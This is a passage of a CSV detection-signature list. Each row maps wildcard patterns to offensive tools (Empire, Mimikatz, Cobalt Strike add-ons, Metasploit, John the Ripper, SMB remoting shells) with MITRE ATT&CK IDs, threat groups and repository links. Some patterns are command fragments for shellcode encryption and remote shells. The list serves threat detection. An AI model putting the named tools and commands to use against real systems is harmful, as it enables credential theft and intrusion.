","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enable-SeDebugPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enable-SeDebugPrivilege*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*encdatavault2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*encfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*encode_payload rc4 *.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*EncodeGroup/AggressiveProxy*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*EncodeGroup/UAC-SilentClean*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*encodeScriptPolyglot*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*EncodeShellcode(*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*encrypt.py *.bin -p * -o *.enc*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*encrypt/encryptFile.go*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*encrypt/encryptUrl.go*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" +"*Encrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*encrypted_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*EncryptedPfx.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"*EncryptedZIP.csproj*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*EncryptedZIP.exe*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*EncryptShellcode(*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*ENDTHISFILETRANSMISSIONEGRESSASSESS*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*ENDTHISFILETRANSMISSIONEGRESSASSESS*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Enelg52/KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Engineer_super.exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*engjibo/NetUser*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*enigma_fileless_uac_bypass*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*enigma0x3*","offensive_tool_keyword","Github Username","Github Author of malicious script and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/enigma0x3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*enkomio/AlanFramework*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*enpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*enpass5tojohn.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Enter-SMBSession -ComputerName *","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*Enter-SMBSession* -PipeName * -ServiceName *","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"*Enter-WmiShell *","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*Enter-WmiShell.ps1*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*--entrypoint Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*enum_artifacts_list.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_av_excluded.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_avproducts.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*enum_brocade.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_domain_info.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*enum_firefox.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_hostfile.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_logged_on_users*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_logged_on_users.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_mikrotik.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security 